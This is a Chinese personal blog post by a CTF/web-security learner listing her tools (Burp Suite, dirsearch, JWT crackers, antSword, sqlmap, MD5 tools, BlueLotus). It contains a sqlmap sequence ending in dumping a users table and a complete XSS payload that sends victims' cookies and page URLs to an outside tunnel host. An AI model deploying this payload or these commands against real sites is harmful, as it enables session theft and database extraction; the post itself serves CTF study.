  <!DOCTYPE html>
  <html lang="zh-CN"  
      data-theme-mode="auto"
  >
  <head>
  <meta charset="utf-8">
  
  
  
  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_ex15nbittbh';window.REIMU_CONFIG.clipboard_tips = {"success":{"zh-CN":"复制成功 (*^▽^*)"},"fail":{"zh-CN":"复制失败 (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = '本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'http://ether-lin.cn';window.REIMU_CONFIG.relative = '/';</script>
  <title>
    工具使用 | 旧书页间，夹着半叶梧桐
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media='all'">
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_ex15nbittbh.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    
<link rel="stylesheet" href="/css/loader.css">

    <meta name="description" content="本文的作用是使 Ether 小姐更加熟悉她电脑上的工具，嘻嘻  Burp Suite 当当当当！首先就是伟大的 bp啦，功能非常之强大 安全工具 | BurpSuite安装使用（保姆级教程！)-CSDN博客 可以抓包改包、爆破、数据外带等等  SwitchyOmega 一个浏览器，主要用来配合 Burp Suite使用，使 bp 只代理浏览器而不影响系统  Hackbar 这也是一个浏览器插件，主">
<meta property="og:type" content="article">
<meta property="og:title" content="工具使用">
<meta property="og:url" content="http://ether-lin.cn/2026/05/28/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/index.html">
<meta property="og:site_name" content="旧书页间，夹着半叶梧桐">
<meta property="og:description" content="本文的作用是使 Ether 小姐更加熟悉她电脑上的工具，嘻嘻  Burp Suite 当当当当！首先就是伟大的 bp啦，功能非常之强大 安全工具 | BurpSuite安装使用（保姆级教程！)-CSDN博客 可以抓包改包、爆破、数据外带等等  SwitchyOmega 一个浏览器，主要用来配合 Burp Suite使用，使 bp 只代理浏览器而不影响系统  Hackbar 这也是一个浏览器插件，主">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://ether-lin.cn/2026/05/28/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/01.png">
<meta property="og:image" content="http://ether-lin.cn/2026/05/28/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/02.png">
<meta property="article:published_time" content="2026-05-28T03:26:28.000Z">
<meta property="article:modified_time" content="2026-05-28T16:05:56.316Z">
<meta property="article:author" content="Ether">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://ether-lin.cn/2026/05/28/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/01.png">
      <meta name="keywords" content="网络安全学习,成长,思考">
    <link rel="shortcut icon" href="/images/favicon.ico">
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL/toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx/1oA/0l8ysE" crossorigin="anonymous">
      <link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="https://npm.webcache.cn/katex@0.16.24/dist/katex.min.css" integrity="sha384-tTgKLjMYmJr94v8qu2PE5MUGSMbyN2xiH266JUB3gpm8vnnJywd1dWSOEfrFz+YI" crossorigin="anonymous">
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.2/dist/aos.css" integrity="sha384-GMRP93c6Hkz9JVKGAuRR3nTS7M07RwPgTFenXiosjq2VbVgvdDNcz1g6Mkj8AONa" crossorigin="anonymous">

<meta name="generator" content="Hexo 6.3.0"></head>

  <body>
      <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
      </div>
      <div class="loading-word">焦虑是自由的眩晕...</div>
    </div>
  </div>
  <script>
    var time = null;
    var loaderEl = document.getElementById('loader');
    var startLoading = () => {
      time = Date.now();
      loaderEl.classList.remove("loading");
    }
    var hideLoader = () => {
      document.body.style.overflow = 'auto';
      loader.classList.add('loading');
    };

    var endLoading = () => {
      if (!time) {
        hideLoader();
      } else {
        if (Date.now() - time > 500) {
          time = null;
          hideLoader();
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    loaderEl.addEventListener('click', endLoading);
  </script>
<div id="copy-tooltip"></div>
<div id="heatmap-tooltip"></div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav" aria-label="Primary navigation">
        <a class="main-nav-link-wrap" href="/">
            <div class="main-nav-icon icon ">
                  
            </div>
          <span class="main-nav-link">首页</span>
        </a>
        <a class="main-nav-link-wrap" href="/blog/archives">
            <div class="main-nav-icon icon ">
                  
            </div>
          <span class="main-nav-link">归档</span>
        </a>
        <a class="main-nav-link-wrap" href="/blog/about">
            <div class="main-nav-icon icon ">
                  
            </div>
          <span class="main-nav-link">关于</span>
        </a>
        <a class="main-nav-link-wrap" href="/blog/friends">
            <div class="main-nav-icon icon ">
                  
            </div>
          <span class="main-nav-link">友链</span>
        </a>
    <a id="main-nav-toggle" class="nav-icon" aria-label="Toggle navigation" role="button"></a>
  </nav>
  <nav id="sub-nav" aria-label="Secondary navigation">
      <a id="nav-search-btn" class="nav-icon popup-trigger" title="搜索" aria-label="搜索"></a>
  </nav>
</div>
<header id="header" aria-label="Site header">
    <picture></picture>
    <img  fetchpriority="high" src="/images/covers/12.jpg" alt="工具使用">
  <div id="header-outer">
    <div id="header-title">
          <span id="logo">
            <h1 data-aos="slide-up">工具使用</h1>
          </span>
        <h2 id="subtitle-wrap" data-aos="slide-down">
        </h2>
    </div>
  </div>
</header>

        <div id="content" aria-label="Page content" class="sidebar-left"  >
          <aside id="sidebar" aria-label="Sidebar">
  <div class="sidebar-wrapper-container sticky">
  <div class="sidebar-wrapper">
    <div class="sidebar-wrap" data-aos="fade-up">
          <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#burp-suite"><span class="toc-number">1.</span> <span class="toc-text"> Burp Suite</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#switchyomega"><span class="toc-number">2.</span> <span class="toc-text"> SwitchyOmega</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#hackbar"><span class="toc-number">3.</span> <span class="toc-text"> Hackbar</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#dirsearch"><span class="toc-number">4.</span> <span class="toc-text"> dirsearch</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#githacker-main"><span class="toc-number">5.</span> <span class="toc-text"> GitHacker-main</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#cpolar"><span class="toc-number">6.</span> <span class="toc-text"> cpolar</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#jwt"><span class="toc-number">7.</span> <span class="toc-text"> JWT</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#c-jwt-cracker"><span class="toc-number">7.1.</span> <span class="toc-text"> c-jwt-cracker</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jwt_tool"><span class="toc-number">7.2.</span> <span class="toc-text"> jwt_tool</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#antsword"><span class="toc-number">8.</span> <span class="toc-text"> antSword</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#sqlmap"><span class="toc-number">9.</span> <span class="toc-text"> SQLmap</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#docker"><span class="toc-number">10.</span> <span class="toc-text"> Docker</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#phpstudy_64"><span class="toc-number">11.</span> <span class="toc-text"> phpStudy_64</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%B3%E4%BA%8Emd5"><span class="toc-number">12.</span> <span class="toc-text"> 关于MD5</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#hash-ext-attack-master"><span class="toc-number">12.1.</span> <span class="toc-text"> hash-ext-attack-master</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fastcoll"><span class="toc-number">12.2.</span> <span class="toc-text"> fastcoll</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#md5%E8%A7%A3%E5%AF%86"><span class="toc-number">12.3.</span> <span class="toc-text"> md5解密</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#vmware"><span class="toc-number">13.</span> <span class="toc-text"> VMware</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%9A%8F%E6%B3%A2%E9%80%90%E6%B5%81"><span class="toc-number">14.</span> <span class="toc-text"> 随波逐流</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#bluelotus"><span class="toc-number">15.</span> <span class="toc-text"> Bluelotus</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9C%80%E5%90%8E%E8%B4%B4%E5%87%A0%E4%B8%AA%E6%88%91%E5%B8%B8%E7%94%A8%E7%9A%84%E7%BD%91%E7%AB%99"><span class="toc-number">16.</span> <span class="toc-text"> 最后贴几个我常用的网站</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%94%A4%E5%AD%90%E5%9C%A8%E7%BA%BF%E5%B7%A5%E5%85%B7%E7%BD%91-%E9%A6%96%E9%A1%B5"><span class="toc-number">16.1.</span> <span class="toc-text"> 锤子在线工具网 - 首页</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#json%E5%9C%A8%E7%BA%BF-json%E8%A7%A3%E6%9E%90%E6%A0%BC%E5%BC%8F%E5%8C%96so-json%E5%9C%A8%E7%BA%BF%E5%B7%A5%E5%85%B7"><span class="toc-number">16.2.</span> <span class="toc-text"> JSON在线 | JSON解析格式化—SO JSON在线工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#json-web-tokens-jwtio"><span class="toc-number">16.3.</span> <span class="toc-text"> JSON Web Tokens - jwt.io</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#dnslog-platform"><span class="toc-number">16.4.</span> <span class="toc-text"> DNSLog Platform</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD"><span class="toc-number">17.</span> <span class="toc-text"> 未完待续 …</span></a></li></ol>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="Ether" class="lazyload">
  <div class="sidebar-author-name">Ether</div>
  <div class="sidebar-description">求索本身即是归路</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">6</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">2</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">4</div>
  </div>
</div>
<div class="sidebar-social" >
    <div class="icon-email sidebar-social-icon">
      <a href=2930289360@qq.com itemprop="url" target="_blank" aria-label="email" rel="noopener nofollow noreferrer"></a>
    </div>
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/yourname itemprop="url" target="_blank" aria-label="github" rel="noopener nofollow noreferrer"></a>
    </div>
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon ">
                
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/blog/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon ">
                
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/blog/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon ">
                
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/blog/friends" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon ">
                
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
</div>
</div>
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
    </div>
  </div>
  <div class="sidebar-widget">
  </div>
  </div>
</aside>

          <section id="main" aria-label="Main content"><article id="post-工具使用" class="h-entry article" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link icon-calendar" data-aos="zoom-in">
    <time datetime="2026-05-28T03:26:28.000Z" itemprop="datePublished">2026-05-28</time>
    <time style="display: none;" id="post-update-time">2026-05-29</time>
  </span>
</div>

    </div>
    
    <div class="hr-line"></div>
    
    <div class="e-content article-entry" itemprop="articleBody">
        <p>本文的作用是使 Ether 小姐更加熟悉她电脑上的工具，嘻嘻</p>
<h1 id="burp-suite"><a class="markdownIt-Anchor" href="#burp-suite"></a> Burp Suite</h1>
<p>当当当当！首先就是伟大的 <strong>bp</strong>啦，功能非常之强大</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/zkaqlaoniao/article/details/140015343?ops_request_misc=elastic_search_misc&amp;request_id=8b447ec088d1c91dfd253af85bb44e6c&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-140015343-null-null.142%5Ev102%5Epc_search_result_base3&amp;utm_term=Burp%20Suite&amp;spm=1018.2226.3001.4187">安全工具 | BurpSuite安装使用（保姆级教程！)-CSDN博客</a></p>
<p>可以<strong>抓包改包</strong>、<strong>爆破</strong>、<strong>数据外带</strong>等等</p>
<h1 id="switchyomega"><a class="markdownIt-Anchor" href="#switchyomega"></a> SwitchyOmega</h1>
<p>一个浏览器，主要用来配合 <strong>Burp Suite</strong>使用，使 bp 只代理浏览器而不影响系统</p>
<h1 id="hackbar"><a class="markdownIt-Anchor" href="#hackbar"></a> Hackbar</h1>
<p>这也是一个浏览器插件，主要用于<strong>发包</strong>到网页</p>
<h1 id="dirsearch"><a class="markdownIt-Anchor" href="#dirsearch"></a> dirsearch</h1>
<p>轻量级目录爆破工具，支持多线程、自定义字典、状态码过滤，常用于发现隐藏路径、备份文件、管理后台等。（PS：好官方）</p>
<p>反正就是没思路就上<code>dirsearch</code>扫一下</p>
<h1 id="githacker-main"><a class="markdownIt-Anchor" href="#githacker-main"></a> GitHacker-main</h1>
<p>从泄露的 <code>.git</code> 目录恢复源码，用于源码审计与敏感信息挖掘。</p>
<p><font style="color:#DF2A3F;">注：</font><font style="color:#DF2A3F;">Linux</font><font style="color:#DF2A3F;">环境下使用</font></p>
<h1 id="cpolar"><a class="markdownIt-Anchor" href="#cpolar"></a> cpolar</h1>
<p>内网穿透工具，将本地服务（如 Burp Collaborator、HTTP Server）暴露到公网，用于 DNS/OOB 回显、CSRF 带外测试等。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cpolar http 80   //用于连接本地网页</span><br><span class="line">cpolar tcp 80    //用于监听</span><br></pre></td></tr></table></figure>
<h1 id="jwt"><a class="markdownIt-Anchor" href="#jwt"></a> JWT</h1>
<h2 id="c-jwt-cracker"><a class="markdownIt-Anchor" href="#c-jwt-cracker"></a> c-jwt-cracker</h2>
<p>暴力破解 HS256 密钥</p>
<p><font style="color:#DF2A3F;">注：</font><font style="color:#DF2A3F;">Linux</font><font style="color:#DF2A3F;">环境下使用</font></p>
<h2 id="jwt_tool"><a class="markdownIt-Anchor" href="#jwt_tool"></a> jwt_tool</h2>
<p>支持签名伪造、密钥爆破、头部篡改、算法降级（如 <code>none</code> 攻击），是 JWT 审计必备。</p>
<p><font style="color:#DF2A3F;">注：</font><code>&lt;font style=&quot;color:#DF2A3F;&quot;&gt;Linux&lt;/font&gt;</code><font style="color:#DF2A3F;">环境下使用</font></p>
<h1 id="antsword"><a class="markdownIt-Anchor" href="#antsword"></a> antSword</h1>
<p>轻量级 WebShell 管理工具（支持 ASP/PHP/JSP 等），用于后渗透阶段控制；</p>
<p>文件上传后，连服务器用的</p>
<p><img src="01.png" alt="actuator-env" /></p>
<p><img src="02.png" alt="actuator-env" /></p>
<h1 id="sqlmap"><a class="markdownIt-Anchor" href="#sqlmap"></a> SQLmap</h1>
<p>SQLmap 是一款开源的自动化 SQL 注入检测与利用工具，能自动识别各种数据库（MySQL/Oracle/PostgreSQL等）的注入点，并且可以一键完成从发现漏洞到提取数据、甚至获取系统权限的全流程。</p>
<p>以下是一些常用命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 1. 检测「注入点」</span></span><br><span class="line"><span class="comment"># -u : 指定目标URL(需包含可疑参数)</span></span><br><span class="line"><span class="comment"># --batch : 自动选择默认选项, 跳过所有交互确认(新手必加)</span></span><br><span class="line">sqlmap -u <span class="string">&quot;http://xx/?id=1&quot;</span> --batch</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2. 枚举所有「数据库」</span></span><br><span class="line"><span class="comment"># --dbs : 列出目标服务器上所有可用的数据库名称</span></span><br><span class="line">sqlmap -u <span class="string">&quot;http://xx/?id=1&quot;</span> --dbs --batch</span><br><span class="line"></span><br><span class="line"><span class="comment"># 3. 查看当前网站使用的「数据库」</span></span><br><span class="line"><span class="comment"># --current-db : 获取当前Web应用连接的数据库名</span></span><br><span class="line"><span class="comment"># 相比--dbs更精准, 直接定位业务库</span></span><br><span class="line">sqlmap -u <span class="string">&quot;http://xx/?id=1&quot;</span> --current-db --batch</span><br><span class="line"></span><br><span class="line"><span class="comment"># 4. 枚举指定数据库中的「数据表」</span></span><br><span class="line"><span class="comment"># -D : 指定数据库名(替换为上一步查到的实际库名)</span></span><br><span class="line"><span class="comment"># --tables : 列出该库下所有表名</span></span><br><span class="line">sqlmap -u <span class="string">&quot;http://xx/?id=1&quot;</span> -D <span class="string">&quot;security&quot;</span> --tables --batch</span><br><span class="line"></span><br><span class="line"><span class="comment"># 5. 枚举指定表中的「列」</span></span><br><span class="line"><span class="comment"># -T : 指定表名(替换为上一步查到的实际表名)</span></span><br><span class="line"><span class="comment"># --columns : 列出该表所有字段名及数据类型</span></span><br><span class="line">sqlmap -u <span class="string">&quot;http://xx/?id=1&quot;</span> -D <span class="string">&quot;security&quot;</span> -T <span class="string">&quot;users&quot;</span> --columns --batch</span><br><span class="line"></span><br><span class="line"><span class="comment"># 6. 导出指定表的「完整数据」</span></span><br><span class="line"><span class="comment"># --dump : 提取并展示表中所有记录</span></span><br><span class="line"><span class="comment"># 结果会自动保存到 ~/.local/share/sqlmap/output/ 目录</span></span><br><span class="line">sqlmap -u <span class="string">&quot;http://xx/?id=1&quot;</span> -D <span class="string">&quot;security&quot;</span> -T <span class="string">&quot;users&quot;</span> --dump --batch</span><br><span class="line"></span><br><span class="line"><span class="comment"># 7. Cookie 注入测试</span></span><br><span class="line"><span class="comment"># --cookie : 指定Cookie值, 必须用单/双引号包裹防止特殊字符被Shell解析</span></span><br><span class="line"><span class="comment"># 适用场景: 后台接口、登录态校验、JWT/Session作为查询条件等</span></span><br><span class="line"><span class="comment"># 💡 技巧: 多个Cookie用分号分隔, 如 &#x27;PHPSESSID=abc; token=xyz&#x27;</span></span><br><span class="line">sqlmap -u <span class="string">&quot;http://xx/?id=x&quot;</span> --cookie <span class="string">&quot;PHPSESSID=xxxx; token=yyyy&quot;</span> --batch</span><br></pre></td></tr></table></figure>
<h1 id="docker"><a class="markdownIt-Anchor" href="#docker"></a> Docker</h1>
<p>用于快速部署靶场、隔离测试环境（如运行 DVWA、WebGoat、Juice Shop），避免污染本机系统。</p>
<p>用于<strong>写web的附件题</strong>和<strong>赛后复现</strong></p>
<h1 id="phpstudy_64"><a class="markdownIt-Anchor" href="#phpstudy_64"></a> phpStudy_64</h1>
<p>一键集成 PHP/MySQL/Apache 环境，快速部署漏洞靶机</p>
<h1 id="关于md5"><a class="markdownIt-Anchor" href="#关于md5"></a> 关于MD5</h1>
<h2 id="hash-ext-attack-master"><a class="markdownIt-Anchor" href="#hash-ext-attack-master"></a> hash-ext-attack-master</h2>
<p>实现哈希长度扩展攻击（如对 <code>sha1(secret+data)</code> 类签名伪造）。</p>
<p><font style="color:#DF2A3F;">注：</font><font style="color:#DF2A3F;">Linux</font><font style="color:#DF2A3F;">环境下使用</font></p>
<h2 id="fastcoll"><a class="markdownIt-Anchor" href="#fastcoll"></a> fastcoll</h2>
<p>生成 MD5 碰撞文件（学术/红队用途，演示“相同哈希不同内容”风险）。</p>
<p><font style="color:#DF2A3F;">注：</font><font style="color:#DF2A3F;">Linux</font><font style="color:#DF2A3F;">环境下使用</font></p>
<h2 id="md5解密"><a class="markdownIt-Anchor" href="#md5解密"></a> md5解密</h2>
<p>本地 MD5 破解工具（字典/彩虹表比对），适用于弱口令哈希验证（非真解密）。</p>
<h1 id="vmware"><a class="markdownIt-Anchor" href="#vmware"></a> VMware</h1>
<p>对于我来说主要用于配置 <code>Linux</code> 环境</p>
<p>因为<code>Linux</code>无法复制粘贴，</p>
<p>在 <strong>PowerShell或CMD</strong>里输入：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh 你的用户名@你的端口号</span><br></pre></td></tr></table></figure>
<p>就可以在 Windows 系统使用 Linux 了</p>
<p>然后我是使用的共享文件夹来使用工具，具体命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 1. 创建挂载点（如果不存在）</span></span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">mkdir</span> -p /mnt/hgfs</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2. 执行挂载命令</span></span><br><span class="line"><span class="built_in">sudo</span> vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other -o uid=1000 -o gid=1000</span><br><span class="line"></span><br><span class="line"><span class="comment"># 3. 验证是否成功</span></span><br><span class="line"><span class="built_in">ls</span> /mnt/hgfs/</span><br></pre></td></tr></table></figure>
<h1 id="随波逐流"><a class="markdownIt-Anchor" href="#随波逐流"></a> 随波逐流</h1>
<p>伟大的编码解码工具</p>
<h1 id="bluelotus"><a class="markdownIt-Anchor" href="#bluelotus"></a> Bluelotus</h1>
<p>由清华大学蓝莲花战队开发的<code>XSS</code>接收工具</p>
<p>不过要先在小皮面板配置好才可以使用</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_36292543/article/details/136067874?ops_request_misc=elastic_search_misc&amp;request_id=593e905d8d25b1d265687f383439d940&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_click~default-1-136067874-null-null.142%5Ev102%5Epc_search_result_base3&amp;utm_term=Bluelotus&amp;spm=1018.2226.3001.4187">BlueLotus 下载安装使用-CSDN博客</a></p>
<p>注意：使用时<code>cpolar</code>也需要打开，用于开启隧道</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cpolar http 80</span><br></pre></td></tr></table></figure>
<p>最后记得<strong>把 payload 里的接收地址改成 cpolar 给的公网地址</strong>（比如 <code>https://xxxx.cpolar.cn</code>）</p>
<p>例如：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="keyword">var</span> website=<span class="string">&quot;https://xxxx.cpolar.cn/xss/&quot;</span>;(<span class="keyword">function</span>(<span class="params"></span>)&#123;(<span class="keyword">new</span> <span class="title class_">Image</span>()).<span class="property">src</span>=website+<span class="string">&#x27;/?keepsession=1&amp;location=&#x27;</span>+<span class="built_in">escape</span>((<span class="keyword">function</span>(<span class="params"></span>)&#123;<span class="keyword">try</span>&#123;<span class="keyword">return</span> <span class="variable language_">document</span>.<span class="property">location</span>.<span class="property">href</span>&#125;<span class="keyword">catch</span>(e)&#123;<span class="keyword">return</span><span class="string">&#x27;&#x27;</span>&#125;&#125;)())+<span class="string">&#x27;&amp;toplocation=&#x27;</span>+<span class="built_in">escape</span>((<span class="keyword">function</span>(<span class="params"></span>)&#123;<span class="keyword">try</span>&#123;<span class="keyword">return</span> top.<span class="property">location</span>.<span class="property">href</span>&#125;<span class="keyword">catch</span>(e)&#123;<span class="keyword">return</span><span class="string">&#x27;&#x27;</span>&#125;&#125;)())+<span class="string">&#x27;&amp;cookie=&#x27;</span>+<span class="built_in">escape</span>((<span class="keyword">function</span>(<span class="params"></span>)&#123;<span class="keyword">try</span>&#123;<span class="keyword">return</span> <span class="variable language_">document</span>.<span class="property">cookie</span>&#125;<span class="keyword">catch</span>(e)&#123;<span class="keyword">return</span><span class="string">&#x27;&#x27;</span>&#125;&#125;)())+<span class="string">&#x27;&amp;opener=&#x27;</span>+<span class="built_in">escape</span>((<span class="keyword">function</span>(<span class="params"></span>)&#123;<span class="keyword">try</span>&#123;<span class="keyword">return</span>(<span class="variable language_">window</span>.<span class="property">opener</span>&amp;&amp;<span class="variable language_">window</span>.<span class="property">opener</span>.<span class="property">location</span>.<span class="property">href</span>)?<span class="variable language_">window</span>.<span class="property">opener</span>.<span class="property">location</span>.<span class="property">href</span>:<span class="string">&#x27;&#x27;</span>&#125;<span class="keyword">catch</span>(e)&#123;<span class="keyword">return</span><span class="string">&#x27;&#x27;</span>&#125;&#125;)());&#125;)();&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<h1 id="最后贴几个我常用的网站"><a class="markdownIt-Anchor" href="#最后贴几个我常用的网站"></a> 最后贴几个我常用的网站</h1>
<h2 id="锤子在线工具网-首页"><a class="markdownIt-Anchor" href="#锤子在线工具网-首页"></a> <a target="_blank" rel="noopener" href="https://www.toolhelper.cn/">锤子在线工具网 - 首页</a></h2>
<p><strong>核心功能</strong>：</p>
<ul>
<li><strong>编码/解码</strong>：Base64、URL、Hex、Unicode、HTML 实体等一键互转。</li>
<li><strong>哈希计算</strong>：MD5、SHA1/256、NTLM 等哈希值生成与识别。</li>
<li><strong>Payload 生成</strong>：SQL 注入、XSS、命令注入等常用 payload 模板。</li>
<li><strong>网络工具</strong>：端口扫描、Whois 查询、IP 归属地等。</li>
</ul>
<h2 id="json在线-json解析格式化so-json在线工具"><a class="markdownIt-Anchor" href="#json在线-json解析格式化so-json在线工具"></a> <a target="_blank" rel="noopener" href="https://www.sojson.com/">JSON在线 | JSON解析格式化—SO JSON在线工具</a></h2>
<p><strong>核心功能</strong>：</p>
<ul>
<li><strong>JSON 处理</strong>：格式化、压缩、校验、JSON 转 CSV/Excel/Java 实体类。</li>
